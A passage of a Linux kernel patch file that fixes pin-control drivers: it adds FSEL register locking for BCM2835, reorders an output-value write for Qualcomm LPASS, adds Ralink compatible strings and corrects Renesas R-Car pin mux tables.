+ 		ret = regmap_field_write(wiz->p_standard_mode[i], mode);
+diff --git a/drivers/pinctrl/bcm/pinctrl-bcm2835.c b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+index c7cdccdb4332a..0f1ab0829ffe6 100644
+--- a/drivers/pinctrl/bcm/pinctrl-bcm2835.c
++++ b/drivers/pinctrl/bcm/pinctrl-bcm2835.c
+@@ -90,6 +90,8 @@ struct bcm2835_pinctrl {
+ 	struct pinctrl_gpio_range gpio_range;
+ 
+ 	raw_spinlock_t irq_lock[BCM2835_NUM_BANKS];
++	/* Protect FSEL registers */
++	spinlock_t fsel_lock;
+ };
+ 
+ /* pins are just named GPIO0..GPIO53 */
+@@ -284,14 +286,19 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 		struct bcm2835_pinctrl *pc, unsigned pin,
+ 		enum bcm2835_fsel fsel)
+ {
+-	u32 val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
+-	enum bcm2835_fsel cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
++	u32 val;
++	enum bcm2835_fsel cur;
++	unsigned long flags;
++
++	spin_lock_irqsave(&pc->fsel_lock, flags);
++	val = bcm2835_gpio_rd(pc, FSEL_REG(pin));
++	cur = (val >> FSEL_SHIFT(pin)) & BCM2835_FSEL_MASK;
+ 
+ 	dev_dbg(pc->dev, "read %08x (%u => %s)\n", val, pin,
+-			bcm2835_functions[cur]);
++		bcm2835_functions[cur]);
+ 
+ 	if (cur == fsel)
+-		return;
++		goto unlock;
+ 
+ 	if (cur != BCM2835_FSEL_GPIO_IN && fsel != BCM2835_FSEL_GPIO_IN) {
+ 		/* always transition through GPIO_IN */
+@@ -309,6 +316,9 @@ static inline void bcm2835_pinctrl_fsel_set(
+ 	dev_dbg(pc->dev, "write %08x (%u <= %s)\n", val, pin,
+ 			bcm2835_functions[fsel]);
+ 	bcm2835_gpio_wr(pc, FSEL_REG(pin), val);
++
++unlock:
++	spin_unlock_irqrestore(&pc->fsel_lock, flags);
+ }
+ 
+ static int bcm2835_gpio_direction_input(struct gpio_chip *chip, unsigned offset)
+@@ -1248,6 +1258,7 @@ static int bcm2835_pinctrl_probe(struct platform_device *pdev)
+ 	pc->gpio_chip = *pdata->gpio_chip;
+ 	pc->gpio_chip.parent = dev;
+ 
++	spin_lock_init(&pc->fsel_lock);
+ 	for (i = 0; i < BCM2835_NUM_BANKS; i++) {
+ 		unsigned long events;
+ 		unsigned offset;
+diff --git a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+index 3dc670faa59ec..2ee5294c21d8e 100644
+--- a/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
++++ b/drivers/pinctrl/qcom/pinctrl-lpass-lpi.c
+@@ -221,6 +221,15 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 		}
+ 	}
+ 
++	/*
++	 * As per Hardware Programming Guide, when configuring pin as output,
++	 * set the pin value before setting output-enable (OE).
++	 */
++	if (output_enabled) {
++		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
++		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
++	}
++
+ 	val = lpi_gpio_read(pctrl, group, LPI_GPIO_CFG_REG);
+ 
+ 	u32p_replace_bits(&val, pullup, LPI_GPIO_PULL_MASK);
+@@ -230,11 +239,6 @@ static int lpi_config_set(struct pinctrl_dev *pctldev, unsigned int group,
+ 
+ 	lpi_gpio_write(pctrl, group, LPI_GPIO_CFG_REG, val);
+ 
+-	if (output_enabled) {
+-		val = u32_encode_bits(value ? 1 : 0, LPI_GPIO_VALUE_OUT_MASK);
+-		lpi_gpio_write(pctrl, group, LPI_GPIO_VALUE_REG, val);
+-	}
+-
+ 	return 0;
+ }
+ 
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7620.c b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+index 22ff16eff02ff..929a1ace56aeb 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7620.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7620.c
+@@ -372,6 +372,7 @@ static int mt7620_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7620_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7620-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7620_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-mt7621.c b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+index b47968f40e0c2..0297cf455b3a0 100644
+--- a/drivers/pinctrl/ralink/pinctrl-mt7621.c
++++ b/drivers/pinctrl/ralink/pinctrl-mt7621.c
+@@ -97,6 +97,7 @@ static int mt7621_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id mt7621_pinctrl_match[] = {
+ 	{ .compatible = "ralink,mt7621-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, mt7621_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt2880.c b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+index 811e12df11331..fd9af7c2ffd0e 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt2880.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt2880.c
+@@ -41,6 +41,7 @@ static int rt2880_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt2880_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt2880-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt2880_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt305x.c b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+index 5b204b7ca1f3c..13a012a65d1d8 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt305x.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt305x.c
+@@ -118,6 +118,7 @@ static int rt305x_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt305x_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt305x-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt305x_pinctrl_match);
+diff --git a/drivers/pinctrl/ralink/pinctrl-rt3883.c b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+index 44a66c3d2d2a1..b263764011e76 100644
+--- a/drivers/pinctrl/ralink/pinctrl-rt3883.c
++++ b/drivers/pinctrl/ralink/pinctrl-rt3883.c
+@@ -88,6 +88,7 @@ static int rt3883_pinctrl_probe(struct platform_device *pdev)
+ 
+ static const struct of_device_id rt3883_pinctrl_match[] = {
+ 	{ .compatible = "ralink,rt3883-pinctrl" },
++	{ .compatible = "ralink,rt2880-pinmux" },
+ 	{}
+ };
+ MODULE_DEVICE_TABLE(of, rt3883_pinctrl_match);
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779a0.c b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+index 760c83a8740bd..6069869353bb4 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779a0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779a0.c
+@@ -696,16 +696,8 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+ 
+ 	PINMUX_SINGLE(AVB0_PHY_INT),
+-	PINMUX_SINGLE(AVB0_MAGIC),
+-	PINMUX_SINGLE(AVB0_MDC),
+-	PINMUX_SINGLE(AVB0_MDIO),
+-	PINMUX_SINGLE(AVB0_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB1_PHY_INT),
+-	PINMUX_SINGLE(AVB1_MAGIC),
+-	PINMUX_SINGLE(AVB1_MDC),
+-	PINMUX_SINGLE(AVB1_MDIO),
+-	PINMUX_SINGLE(AVB1_TXCREFCLK),
+ 
+ 	PINMUX_SINGLE(AVB2_AVTP_PPS),
+ 	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779f0.c b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+index 417c357f16b19..65c141ce909ac 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779f0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779f0.c
+@@ -1213,7 +1213,7 @@ static const unsigned int tsn1_avtp_pps_pins[] = {
+ 	RCAR_GP_PIN(3, 13),
+ };
+ static const unsigned int tsn1_avtp_pps_mux[] = {
+-	TSN0_AVTP_PPS_MARK,
++	TSN1_AVTP_PPS_MARK,
+ };
+ static const unsigned int tsn1_avtp_capture_a_pins[] = {
+ 	/* TSN1_AVTP_CAPTURE_A */
+diff --git a/drivers/pinctrl/renesas/pfc-r8a779g0.c b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+index 5dd1c2c7708a8..43a63a21a6fb5 100644
+--- a/drivers/pinctrl/renesas/pfc-r8a779g0.c
++++ b/drivers/pinctrl/renesas/pfc-r8a779g0.c
+@@ -156,54 +156,54 @@
+ #define GPSR3_0		F_(MMC_SD_D1,		IP0SR3_3_0)
+ 
+ /* GPSR4 */
+-#define GPSR4_24	FM(AVS1)
+-#define GPSR4_23	FM(AVS0)
+-#define GPSR4_22	FM(PCIE1_CLKREQ_N)
+-#define GPSR4_21	FM(PCIE0_CLKREQ_N)
+-#define GPSR4_20	FM(TSN0_TXCREFCLK)
+-#define GPSR4_19	FM(TSN0_TD2)
+-#define GPSR4_18	FM(TSN0_TD3)
+-#define GPSR4_17	FM(TSN0_RD2)
+-#define GPSR4_16	FM(TSN0_RD3)
+-#define GPSR4_15	FM(TSN0_TD0)
+-#define GPSR4_14	FM(TSN0_TD1)
+-#define GPSR4_13	FM(TSN0_RD1)
+-#define GPSR4_12	FM(TSN0_TXC)
+-#define GPSR4_11	FM(TSN0_RXC)
+-#define GPSR4_10	FM(TSN0_RD0)
+-#define GPSR4_9		FM(TSN0_TX_CTL)
+-#define GPSR4_8		FM(TSN0_AVTP_PPS0)
+-#define GPSR4_7		FM(TSN0_RX_CTL)
+-#define GPSR4_6		FM(TSN0_AVTP_CAPTURE)
+-#define GPSR4_5		FM(TSN0_AVTP_MATCH)
+-#define GPSR4_4		FM(TSN0_LINK)
+-#define GPSR4_3		FM(TSN0_PHY_INT)
+-#define GPSR4_2		FM(TSN0_AVTP_PPS1)
+-#define GPSR4_1		FM(TSN0_MDC)
+-#define GPSR4_0		FM(TSN0_MDIO)
++#define GPSR4_24	F_(AVS1,		IP3SR4_3_0)
++#define GPSR4_23	F_(AVS0,		IP2SR4_31_28)
++#define GPSR4_22	F_(PCIE1_CLKREQ_N,	IP2SR4_27_24)
++#define GPSR4_21	F_(PCIE0_CLKREQ_N,	IP2SR4_23_20)
++#define GPSR4_20	F_(TSN0_TXCREFCLK,	IP2SR4_19_16)
++#define GPSR4_19	F_(TSN0_TD2,		IP2SR4_15_12)
++#define GPSR4_18	F_(TSN0_TD3,		IP2SR4_11_8)
++#define GPSR4_17	F_(TSN0_RD2,		IP2SR4_7_4)
++#define GPSR4_16	F_(TSN0_RD3,		IP2SR4_3_0)
++#define GPSR4_15	F_(TSN0_TD0,		IP1SR4_31_28)
++#define GPSR4_14	F_(TSN0_TD1,		IP1SR4_27_24)
++#define GPSR4_13	F_(TSN0_RD1,		IP1SR4_23_20)
++#define GPSR4_12	F_(TSN0_TXC,		IP1SR4_19_16)
++#define GPSR4_11	F_(TSN0_RXC,		IP1SR4_15_12)
++#define GPSR4_10	F_(TSN0_RD0,		IP1SR4_11_8)
++#define GPSR4_9		F_(TSN0_TX_CTL,		IP1SR4_7_4)
++#define GPSR4_8		F_(TSN0_AVTP_PPS0,	IP1SR4_3_0)
++#define GPSR4_7		F_(TSN0_RX_CTL,		IP0SR4_31_28)
++#define GPSR4_6		F_(TSN0_AVTP_CAPTURE,	IP0SR4_27_24)
++#define GPSR4_5		F_(TSN0_AVTP_MATCH,	IP0SR4_23_20)
++#define GPSR4_4		F_(TSN0_LINK,		IP0SR4_19_16)
++#define GPSR4_3		F_(TSN0_PHY_INT,	IP0SR4_15_12)
++#define GPSR4_2		F_(TSN0_AVTP_PPS1,	IP0SR4_11_8)
++#define GPSR4_1		F_(TSN0_MDC,		IP0SR4_7_4)
++#define GPSR4_0		F_(TSN0_MDIO,		IP0SR4_3_0)
+ 
+ /* GPSR 5 */
+-#define GPSR5_20	FM(AVB2_RX_CTL)
+-#define GPSR5_19	FM(AVB2_TX_CTL)
+-#define GPSR5_18	FM(AVB2_RXC)
+-#define GPSR5_17	FM(AVB2_RD0)
+-#define GPSR5_16	FM(AVB2_TXC)
+-#define GPSR5_15	FM(AVB2_TD0)
+-#define GPSR5_14	FM(AVB2_RD1)
+-#define GPSR5_13	FM(AVB2_RD2)
+-#define GPSR5_12	FM(AVB2_TD1)
+-#define GPSR5_11	FM(AVB2_TD2)
+-#define GPSR5_10	FM(AVB2_MDIO)
+-#define GPSR5_9		FM(AVB2_RD3)
+-#define GPSR5_8		FM(AVB2_TD3)
+-#define GPSR5_7		FM(AVB2_TXCREFCLK)
+-#define GPSR5_6		FM(AVB2_MDC)
+-#define GPSR5_5		FM(AVB2_MAGIC)
+-#define GPSR5_4		FM(AVB2_PHY_INT)
+-#define GPSR5_3		FM(AVB2_LINK)
+-#define GPSR5_2		FM(AVB2_AVTP_MATCH)
+-#define GPSR5_1		FM(AVB2_AVTP_CAPTURE)
+-#define GPSR5_0		FM(AVB2_AVTP_PPS)
++#define GPSR5_20	F_(AVB2_RX_CTL,		IP2SR5_19_16)
++#define GPSR5_19	F_(AVB2_TX_CTL,		IP2SR5_15_12)
++#define GPSR5_18	F_(AVB2_RXC,		IP2SR5_11_8)
++#define GPSR5_17	F_(AVB2_RD0,		IP2SR5_7_4)
++#define GPSR5_16	F_(AVB2_TXC,		IP2SR5_3_0)
++#define GPSR5_15	F_(AVB2_TD0,		IP1SR5_31_28)
++#define GPSR5_14	F_(AVB2_RD1,		IP1SR5_27_24)
++#define GPSR5_13	F_(AVB2_RD2,		IP1SR5_23_20)
++#define GPSR5_12	F_(AVB2_TD1,		IP1SR5_19_16)
++#define GPSR5_11	F_(AVB2_TD2,		IP1SR5_15_12)
++#define GPSR5_10	F_(AVB2_MDIO,		IP1SR5_11_8)
++#define GPSR5_9		F_(AVB2_RD3,		IP1SR5_7_4)
++#define GPSR5_8		F_(AVB2_TD3,		IP1SR5_3_0)
++#define GPSR5_7		F_(AVB2_TXCREFCLK,	IP0SR5_31_28)
++#define GPSR5_6		F_(AVB2_MDC,		IP0SR5_27_24)
++#define GPSR5_5		F_(AVB2_MAGIC,		IP0SR5_23_20)
++#define GPSR5_4		F_(AVB2_PHY_INT,	IP0SR5_19_16)
++#define GPSR5_3		F_(AVB2_LINK,		IP0SR5_15_12)
++#define GPSR5_2		F_(AVB2_AVTP_MATCH,	IP0SR5_11_8)
++#define GPSR5_1		F_(AVB2_AVTP_CAPTURE,	IP0SR5_7_4)
++#define GPSR5_0		F_(AVB2_AVTP_PPS,	IP0SR5_3_0)
+ 
+ /* GPSR 6 */
+ #define GPSR6_20	F_(AVB1_TXCREFCLK,		IP2SR6_19_16)
+@@ -268,209 +268,271 @@
+ #define GPSR8_0		F_(SCL0,			IP0SR8_3_0)
+ 
+ /* SR0 */
+-/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_B)		FM(TCLK2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR0_3_0	F_(0, 0)		FM(ERROROUTC_N_B)	FM(TCLK2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_7_4	F_(0, 0)		FM(MSIOF3_SS1)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_11_8	F_(0, 0)		FM(MSIOF3_SS2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_15_12	FM(IRQ3)		FM(MSIOF3_SCK)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_19_16	FM(IRQ2)		FM(MSIOF3_TXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_23_20	FM(IRQ1)		FM(MSIOF3_RXD)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_27_24	FM(IRQ0)		FM(MSIOF3_SYNC)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR0_31_28	FM(MSIOF5_SS2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR0_3_0	FM(MSIOF5_SS1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_7_4	FM(MSIOF5_SYNC)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_11_8	FM(MSIOF5_TXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_15_12	FM(MSIOF5_SCK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_19_16	FM(MSIOF5_RXD)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_23_20	FM(MSIOF2_SS2)		FM(TCLK1)		FM(IRQ2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_27_24	FM(MSIOF2_SS1)		FM(HTX1)		FM(TX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR0_31_28	FM(MSIOF2_SYNC)		FM(HRX1)		FM(RX1)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR0 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR0_3_0	FM(MSIOF2_TXD)		FM(HCTS1_N)		FM(CTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_7_4	FM(MSIOF2_SCK)		FM(HRTS1_N)		FM(RTS1_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR0_11_8	FM(MSIOF2_RXD)		FM(HSCK1)		FM(SCK1)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR1 */
+-/* IP0SR1 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR1_3_0	FM(MSIOF1_SS2)		FM(HTX3_A)		FM(TX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_7_4	FM(MSIOF1_SS1)		FM(HCTS3_N_A)		FM(RX3)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_11_8	FM(MSIOF1_SYNC)		FM(HRTS3_N_A)		FM(RTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR1_15_12	FM(MSIOF1_SCK)		FM(HSCK3_A)		FM(CTS3_N)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
